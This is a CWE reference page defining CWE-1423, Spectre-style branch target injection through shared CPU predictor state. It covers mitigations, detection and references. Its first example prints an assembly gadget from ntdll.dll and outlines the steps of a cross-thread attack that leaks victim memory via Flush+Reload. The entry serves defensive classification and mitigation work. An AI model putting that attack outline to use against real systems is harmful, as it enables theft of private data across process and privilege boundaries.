CWE

Common Weakness Enumeration

A community-developed list of SW & HW weaknesses that can become vulnerabilities

New to CWE? click here!
CWE Most Important Hardware Weaknesses
CWE Top 25 Most Dangerous Weaknesses
Home > CWE List > CWE- Individual Dictionary Definition (4.14)  
ID

CWE-1423: Exposure of Sensitive Information caused by Shared Microarchitectural Predictor State that Influences Transient Execution

Weakness ID: 1423
Vulnerability Mapping: ALLOWEDThis CWE ID may be used to map to real-world vulnerabilities
Abstraction: BaseBase - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers. For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts. For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers. For users who wish to see all available information for the CWE/CAPEC entry. For users who want to customize what details are displayed.
×

Edit Custom Filter


+ Description
Shared microarchitectural predictor state may allow code to influence transient execution across a hardware boundary, potentially exposing data that is accessible beyond the boundary over a covert channel.
+ Extended Description

Many commodity processors have Instruction Set Architecture (ISA) features that protect software components from one another. These features can include memory segmentation, virtual memory, privilege rings, trusted execution environments, and virtual machines, among others. For example, virtual memory provides each process with its own address space, which prevents processes from accessing each other's private data. Many of these features can be used to form hardware-enforced security boundaries between software components.

When separate software components (for example, two processes) share microarchitectural predictor state across a hardware boundary, code in one component may be able to influence microarchitectural predictor behavior in another component. If the predictor can cause transient execution, the shared predictor state may allow an attacker to influence transient execution in a victim, and in a manner that could allow the attacker to infer private data from the victim by monitoring observable discrepancies (CWE-203) in a covert channel [REF-1400].

Predictor state may be shared when the processor transitions from one component to another (for example, when a process makes a system call to enter the kernel). Many commodity processors have features which prevent microarchitectural predictions that occur before a boundary from influencing predictions that occur after the boundary.

Predictor state may also be shared between hardware threads, for example, sibling hardware threads on a processor that supports simultaneous multithreading (SMT). This sharing may be benign if the hardware threads are simultaneously executing in the same software component, or it could expose a weakness if one sibling is a malicious software component, and the other sibling is a victim software component. Processors that share microarchitectural predictors between hardware threads may have features which prevent microarchitectural predictions that occur on one hardware thread from influencing predictions that occur on another hardware thread.

Features that restrict predictor state sharing across transitions or between hardware threads may be always-on, on by default, or may require opt-in from software.

+ Relationships
Section HelpThis table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.
+ Relevant to the view "Research Concepts" (CWE-1000)
NatureTypeIDName
ChildOfBaseBase - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.1420Exposure of Sensitive Information during Transient Execution
Section HelpThis table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.
+ Relevant to the view "Hardware Design" (CWE-1194)
NatureTypeIDName
ChildOfBaseBase - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.1420Exposure of Sensitive Information during Transient Execution
+ Modes Of Introduction
Section HelpThe different Modes of Introduction provide information about how and when this weakness may be introduced. The Phase identifies a point in the life cycle at which introduction may occur, while the Note provides a typical scenario related to introduction during the given phase.
PhaseNote
Architecture and Design

This weakness can be introduced during hardware architecture and design if predictor state is not properly isolated between modes (for example, user mode and kernel mode), if predictor state is not isolated between hardware threads, or if it is not isolated between other kinds of execution contexts supported by the processor.

Implementation

This weakness can be introduced during system software implementation if predictor-state-sanitizing operations (for example, the indirect branch prediction barrier on Intel x86) are not invoked when switching from one context to another.

System Configuration

This weakness can be introduced if the system has not been configured according to the hardware vendor's recommendations for mitigating the weakness.

+ Applicable Platforms
Section HelpThis listing shows possible areas for which the given weakness could appear. These may be for specific named Languages, Operating Systems, Architectures, Paradigms, Technologies, or a class of such platforms. The platform is listed along with how frequently the given weakness appears for that instance.

Languages

Class: Not Language-Specific (Undetermined Prevalence)

Operating Systems

Class: Not OS-Specific (Undetermined Prevalence)

Architectures

Class: Not Architecture-Specific (Undetermined Prevalence)

Technologies

Microcontroller Hardware (Undetermined Prevalence)

Processor Hardware (Undetermined Prevalence)

Memory Hardware (Undetermined Prevalence)

Class: System on Chip (Undetermined Prevalence)

+ Common Consequences
Section HelpThis table specifies different individual consequences associated with the weakness. The Scope identifies the application security area that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in exploiting this weakness. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a weakness will be exploited to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.
ScopeImpactLikelihood
Confidentiality

Technical Impact: Read Memory

Medium
+ Demonstrative Examples

Example 1

Branch Target Injection (BTI) is a vulnerability that can allow an SMT hardware thread to maliciously train the indirect branch predictor state that is shared with its sibling hardware thread. A cross-thread BTI attack requires the attacker to find a vulnerable code sequence within the victim software. For example, the authors of [REF-1415] identified the following code sequence in the Windows library ntdll.dll:

(bad code)
Example Language: x86 Assembly 

adc edi,dword ptr [ebx+edx+13BE13BDh]
adc dl,byte ptr [edi]
...
indirect_branch_site:
jmp dword ptr [rsi] # at this point attacker knows edx, controls edi and ebx

To successfully exploit this code sequence to disclose the victim's private data, the attacker must also be able to find an indirect branch site within the victim, where the attacker controls the values in edi and ebx, and the attacker knows the value in edx as shown above at the indirect branch site.

A proof-of-concept cross-thread BTI attack might proceed as follows:

  1. The attacker thread and victim thread must be co-scheduled on the same physical processor core.
  2. The attacker thread must train the shared branch predictor so that when the victim thread reaches indirect_branch_site, the jmp instruction will be predicted to target example_code_sequence instead of the correct architectural target. The training procedure may vary by processor, and the attacker may need to reverse-engineer the branch predictor to identify a suitable training algorithm.
  3. This step assumes that the attacker can control some values in the victim program, specifically the values in edi and ebx at indirect_branch_site. When the victim reaches indirect_branch_site the processor will (mis)predict example_code_sequence as the target and (transiently) execute the adc instructions. If the attacker chooses ebx so that `ebx = m
    • 0x13BE13BD - edx, then the first adc will load 32 bits from address m in the victim's address space and add *m (the data loaded from) to the attacker-controlled base address in edi. The second adc instruction accesses a location in memory whose address corresponds to *m`.
  4. The adversary uses a covert channel analysis technique such as Flush+Reload ([REF-1416]) to infer the value of the victim's private data *m.

Example 2

BTI can also allow software in one execution context to maliciously train branch predictor entries that can be used in another context. For example, on some processors user-mode software may be able to train predictor entries that can also be used after transitioning into kernel mode, such as after invoking a system call. This vulnerability does not necessarily require SMT and may instead be performed in synchronous steps, though it does require the attacker to find an exploitable code sequence in the victim's code, for example, in the kernel.

+ Observed Examples
ReferenceDescription
(Branch Target Injection, BTI, Spectre v2). Shared microarchitectural indirect branch predictor state may allow code to influence transient execution across a process, VM, or privilege boundary, potentially exposing data that is accessible beyond the boundary.
(Branch History Injection, BHI, Spectre-BHB). Shared branch history state may allow user-mode code to influence transient execution in the kernel, potentially exposing kernel data over a covert channel.
(RSB underflow, Retbleed). Shared return stack buffer state may allow code that executes before a prediction barrier to influence transient execution after the prediction barrier, potentially exposing data that is accessible beyond the barrier over a covert channel.
+ Potential Mitigations

Phase: Architecture and Design

The hardware designer can attempt to prevent transient execution from causing observable discrepancies in specific covert channels.

Phase: Architecture and Design

Hardware designers may choose to use microarchitectural bits to tag predictor entries. For example, each predictor entry may be tagged with a kernel-mode bit which, when set, indicates that the predictor entry was created in kernel mode. The processor can use this bit to enforce that predictions in the current mode must have been trained in the current mode. This can prevent malicious cross-mode training, such as when user-mode software attempts to create predictor entries that influence transient execution in the kernel. Predictor entry tags can also be used to associate each predictor entry with the SMT thread that created it, and thus the processor can enforce that each predictor entry can only be used by the SMT thread that created it. This can prevent an SMT thread from using predictor entries crafted by a malicious sibling SMT thread.

Effectiveness: Moderate

Note:

Tagging can be highly effective for predictor state that is comprised of discrete elements, such as an array of recently visited branch targets. Predictor state can also have different representations that are not conducive to tagging. For example, some processors keep a compressed digest of branch history which does not contain discrete elements that can be individually tagged.

Phase: Architecture and Design

Hardware designers may choose to sanitize microarchitectural predictor state (for example, branch prediction history) when the processor transitions to a different context, for example, whenever a system call is invoked. Alternatively, the hardware may expose instruction(s) that allow software to sanitize predictor state according to the user's threat model. For example, this can allow operating system software to sanitize predictor state when performing a context switch from one process to another.

Effectiveness: Moderate

Note:

This technique may not be able to mitigate weaknesses that arise from predictor state that is shared across SMT threads. Sanitizing predictor state on context switches may also negatively impact performance, either by removing predictor entries that could be reused when returning to the previous context, or by slowing down the context switch itself.

Phase: Implementation

System software can mitigate this weakness by invoking predictor-state-sanitizing operations (for example, the indirect branch prediction barrier on Intel x86) when switching from one context to another, according to the hardware vendor's recommendations.

Effectiveness: Moderate

Note:

This technique may not be able to mitigate weaknesses that arise from predictor state shared across SMT threads. Sanitizing predictor state may also negatively impact performance in some circumstances.

Phase: Build and Compilation

If the weakness is exposed by a single instruction (or a small set of instructions), then the compiler (or JIT, etc.) can be configured to prevent the affected instruction(s) from being generated. One prominent example of this mitigation is retpoline ([REF-1414]).

Effectiveness: Limited

Note:

This technique is only effective for software that is compiled with this mitigation. Additionally, an alternate instruction sequence may mitigate the weakness on some processors but not others, even when the processors share the same ISA. For example, retpoline has been documented as effective on some x86 processors, but not fully effective on other x86 processors.

Phase: Build and Compilation

Use control-flow integrity (CFI) techniques to constrain the behavior of instructions that redirect the instruction pointer, such as indirect branch instructions.

Effectiveness: Moderate

Note:

Some CFI techniques may not be able to constrain transient execution, even though they are effective at constraining architectural execution. Or they may be able to provide some additional protection against a transient execution weakness, but without comprehensively mitigating the weakness. For example, Clang-CFI provides strong architectural CFI properties and can make some transient execution weaknesses more difficult to exploit [REF-1398].

Phase: Build and Compilation

Use software techniques (including the use of serialization instructions) that are intended to reduce the number of instructions that can be executed transiently after a processor event or misprediction.

Effectiveness: Incidental

Note:

Some transient execution weaknesses can be exploited even if a single instruction is executed transiently after a processor event or mis-prediction. This mitigation strategy has many other pitfalls that prevent it from eliminating this weakness entirely. For example, see [REF-1389].

Phase: System Configuration

Some systems may allow the user to disable predictor sharing. For example, this could be a BIOS configuration, or a model-specific register (MSR) that can be configured by the operating system or virtual machine monitor.

Effectiveness: Moderate

Note:

Disabling predictor sharing can negatively impact performance for some workloads that benefit from shared predictor state.

Phase: Patching and Maintenance

The hardware vendor may provide a patch to, for example, sanitize predictor state when the processor transitions to a different context, or to prevent predictor entries from being shared across SMT threads. A patch may also introduce new ISA that allows software to toggle a mitigation.

Effectiveness: Moderate

Note:

This mitigation may only be fully effective if the patch prevents predictor sharing across all contexts that are affected by the weakness. Additionally, sanitizing predictor state and/or preventing shared predictor state can negatively impact performance in some circumstances.

Phase: Documentation

If a hardware feature can allow microarchitectural predictor state to be shared between contexts, SMT threads, or other architecturally defined boundaries, the hardware designer may opt to disclose this behavior in architecture documentation. This documentation can inform users about potential consequences and effective mitigations.

Effectiveness: High

Phase: Requirements

Processor designers, system software vendors, or other agents may choose to restrict the ability of unprivileged software to access to high-resolution timers that are commonly used to monitor covert channels.

+ Detection Methods

Manual Analysis

This weakness can be detected in hardware by manually inspecting processor specifications. Features that exhibit this weakness may have microarchitectural predictor state that is shared between hardware threads, execution contexts (for example, user and kernel), or other components that may host mutually distrusting software (or firmware, etc.).

Effectiveness: Moderate

Note: Manual analysis may not reveal all weaknesses in a processor specification and should be combined with other detection methods to improve coverage.

Automated Analysis

Software vendors can release tools that detect presence of known weaknesses on a processor. For example, some of these tools can attempt to transiently execute a vulnerable code sequence and detect whether code successfully leaks data in a manner consistent with the weakness under test. Alternatively, some hardware vendors provide enumeration for the presence of a weakness (or lack of a weakness). These enumeration bits can be checked and reported by system software. For example, Linux supports these checks for many commodity processors:

$ cat /proc/cpuinfo | grep bugs | head -n 1

bugs : cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs taa itlb_multihit srbds mmio_stale_data retbleed

Effectiveness: High

Note: This method can be useful for detecting whether a processor if affected by known weaknesses, but it may not be useful for detecting unknown weaknesses

Automated Analysis

This weakness can be detected in hardware by employing static or dynamic taint analysis methods [REF-1401]. These methods can label each predictor entry (or prediction history, etc.) according to the processor context that created it. Taint analysis or information flow analysis can then be applied to detect when predictor state created in one context can influence predictions made in another context.

Effectiveness: Moderate

Note: Automated static or dynamic taint analysis may not reveal all weaknesses in a processor specification and should be combined with other detection methods to improve coverage.
+ Memberships
Section HelpThis MemberOf Relationships table shows additional CWE Categories and Views that reference this weakness as a member. This information is often useful in understanding where a weakness fits within the context of external information sources.
NatureTypeIDName
MemberOfCategoryCategory - a CWE entry that contains a set of other entries that share a common characteristic.1416Comprehensive Categorization: Resource Lifecycle Management
+ Vulnerability Mapping Notes

Usage: ALLOWED

(this CWE ID could be used to map to real-world vulnerabilities)

Reason: Acceptable-Use

Rationale:

This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities

Comments:

Use only when the weakness allows code in one processor context to influence the predictions of code in another processor context via predictor state that is shared between the two contexts. For example, Branch Target Injection, an instance of CWE-1423, can be mitigated by tagging each indirect branch predictor entry according to the processor context in which the entry was created, thus preventing entries created in one context from being used in a different context. However, the mitigated indirect branch predictor can still expose different weaknesses where malicious predictor entries created in one context are used later in the same context (context tags cannot prevent this). One such example is Intra-mode Branch Target Injection. Weaknesses of this sort can map to CWE-1420.
Suggestion:
CWE-IDComment
CWE-1420If a weakness involves a microarchitectural predictor whose state is not shared across processor contexts, then CWE-1420 may be more appropriate for the mapping task.
+ References
[REF-1414] Intel Corporation. "Retpoline: A Branch Target Injection Mitigation". 2022-08-22. <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/retpoline-branch-target-injection-mitigation.html>. URL validated: 2023-02-13.
[REF-1415] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz and Yuval Yarom. "Spectre Attacks: Exploiting Speculative Execution". 2019-05. <https://spectreattack.com/spectre.pdf>. URL validated: 2024-02-14.
[REF-1416] Yuval Yarom and Katrina Falkner. "Flush+Reload: A High Resolution, Low Noise, L3 Cache Side-Channel Attack". 2014. <https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-yarom.pdf>. URL validated: 2023-02-13.
[REF-1398] The Clang Team. "Control Flow Integrity". <https://clang.llvm.org/docs/ControlFlowIntegrity.html>. URL validated: 2024-02-13.
[REF-1389] Alyssa Milburn, Ke Sun and Henrique Kawakami. "You Cannot Always Win the Race: Analyzing the LFENCE/JMP Mitigation for Branch Target Injection". 2022-03-08. <https://arxiv.org/abs/2203.04277>. URL validated: 2024-02-22.
[REF-1400] Intel Corporation. "Refined Speculative Execution Terminology". 2022-03-11. <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/best-practices/refined-speculative-execution-terminology.html>. URL validated: 2024-02-13.
[REF-1401] Neta Bar Kama and Roope Kaivola. "Hardware Security Leak Detection by Symbolic Simulation". 2021-11. <https://ieeexplore.ieee.org/document/9617727>. URL validated: 2024-02-13.
+ Content History
+ Submissions
Submission DateSubmitterOrganization
2023-09-19
(CWE 4.14, 2024-02-29)
Scott D. ConstableIntel Corporation
+ Contributions
Contribution DateContributorOrganization
2024-01-22
(CWE 4.14, 2024-02-29)
David KaplanAMD
Member of Microarchitectural Weaknesses Working Group
2024-01-22
(CWE 4.14, 2024-02-29)
Rafael Dossantos, Abraham Fernandez Rubio, Alric Althoff, Lyndon FawcettArm
Members of Microarchitectural Weaknesses Working Group
2024-01-22
(CWE 4.14, 2024-02-29)
Jason ObergCycuity
Member of Microarchitectural Weaknesses Working Group
2024-01-22
(CWE 4.14, 2024-02-29)
Priya B. IyerIntel Corporation
Member of Microarchitectural Weaknesses Working Group
2024-01-22
(CWE 4.14, 2024-02-29)
Nicole FernRiscure
Member of Microarchitectural Weaknesses Working Group
Page Last Updated: February 29, 2024